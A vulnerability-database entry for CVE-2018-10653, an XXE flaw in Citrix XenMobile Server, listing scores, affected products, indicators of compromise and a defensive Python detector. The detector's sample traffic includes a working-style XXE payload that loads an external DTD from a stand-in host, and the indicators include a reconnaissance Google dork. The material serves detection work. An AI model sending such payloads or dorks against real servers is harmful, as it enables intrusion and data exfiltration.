CVE-2018-10653
published 2018-05-23

CVE-2018-10653: There is an XML External Entity (XXE) Processing Vulnerability in Citrix XenMobile Server 10.8 before RP2 and 10.7 before RP3.

Priority: P2 (62)
Severity: critical, 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 6.80% (93.2nd percentile)

Affected

9 ranges

Vendor | Product | Version range | Fixed in
citrix | citrix_adm | - | -
citrix | citrix_hypervisor | - | -
citrix | citrix_virtual_apps_and_desktops | - | -
citrix | endpoint_management | - | -
citrix | netscaler_adc | - | -
citrix | netscaler_gateway | - | -
citrix | xenmobile_server | - | -
citrix | xenmobile_server | - | -
citrix | xenserver | - | -

Detection & IOCs (extracted from sources)

URL: /zdm/ios/mdm
User-Agent: MDM/1.0
Other: application/x-apple-aspen-mdm
  • Monitor for HTTP PUT requests to the /zdm/ios/mdm endpoint with Content-Type 'application/x-apple-aspen-mdm' and User-Agent 'MDM/1.0', which is the attack vector used in this XXE exploit.
  • Inspect XML payloads sent to /zdm/ios/mdm for DOCTYPE declarations and external entity references (XXE), which are the mechanism of exploitation.
  • Google dork 'inurl:zdm logon' can be used to identify exposed XenMobile instances; monitor for reconnaissance activity matching this pattern against your infrastructure.
  • Watch for outbound DNS/HTTP callbacks from the XenMobile server to external webhook or attacker-controlled URLs, indicative of successful XXE out-of-band data exfiltration.
  • The vulnerability affects XenMobile Server 10.8 before RP2 and 10.7 before RP3. Ensure patched versions (10.8 RP2+ or 10.7 RP3+) are deployed before relying solely on detection.
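The second detection bullet above, as an added example in Python (not code from the page, Citrix, or any vendor): it inspects an HTTP request record for the /zdm/ios/mdm endpoint, Content-Type and User-Agent listed here, then looks in the XML body for a DOCTYPE and for an external entity declaration. The Request shape and the sample traffic are constructed for the example; the caveat it encodes is that genuine Apple MDM plists carry a DOCTYPE too, so only an external (SYSTEM/PUBLIC) entity is treated as the alerting signal.

```python
import re
from dataclasses import dataclass, field

# Indicators listed on this page for the /zdm/ios/mdm attack surface.
MDM_PATH = "/zdm/ios/mdm"
MDM_UA = "MDM/1.0"
MDM_CTYPE = "application/x-apple-aspen-mdm"
# A DOCTYPE is the carrier; an <!ENTITY ...> that is SYSTEM/PUBLIC (or a %
# parameter entity) is the external reference that makes the payload XXE.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


@dataclass
class Request:  # hypothetical record shape, e.g. one line of a WAF/proxy log
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def xxe_indicators(req: Request) -> list[str]:
    """Name every indicator from this page that a single request matches."""
    hdr = {k.lower(): v for k, v in req.headers.items()}
    hits = []
    if req.method.upper() == "PUT" and req.path.startswith(MDM_PATH):
        hits.append("mdm-endpoint-put")
    if hdr.get("content-type", "").split(";")[0].strip().lower() == MDM_CTYPE:
        hits.append("aspen-mdm-content-type")
    if hdr.get("user-agent", "") == MDM_UA:
        hits.append("mdm-user-agent")
    if DOCTYPE_RE.search(req.body):
        hits.append("doctype")
    if EXT_ENTITY_RE.search(req.body):
        hits.append("external-entity")
    return hits


def is_suspicious(req: Request) -> bool:
    """Genuine Apple MDM plists carry a DOCTYPE for the PLIST DTD, so DOCTYPE alone
    would alert on every check-in; require an external entity declaration instead."""
    hits = xxe_indicators(req)
    return "mdm-endpoint-put" in hits and "external-entity" in hits


# Constructed sample traffic (not captured data): a normal check-in and an XXE attempt.
MDM_HEADERS = {"Content-Type": MDM_CTYPE, "User-Agent": MDM_UA}
BENIGN = Request("PUT", MDM_PATH, MDM_HEADERS,
    '<?xml version="1.0"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
    '"http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict/></plist>')
MALICIOUS = Request("PUT", MDM_PATH, MDM_HEADERS,
    '<?xml version="1.0"?><!DOCTYPE plist [<!ENTITY % ext SYSTEM "http://oob.example/x.dtd"> %ext;]>'
    '<plist version="1.0"><dict/></plist>')
```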

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P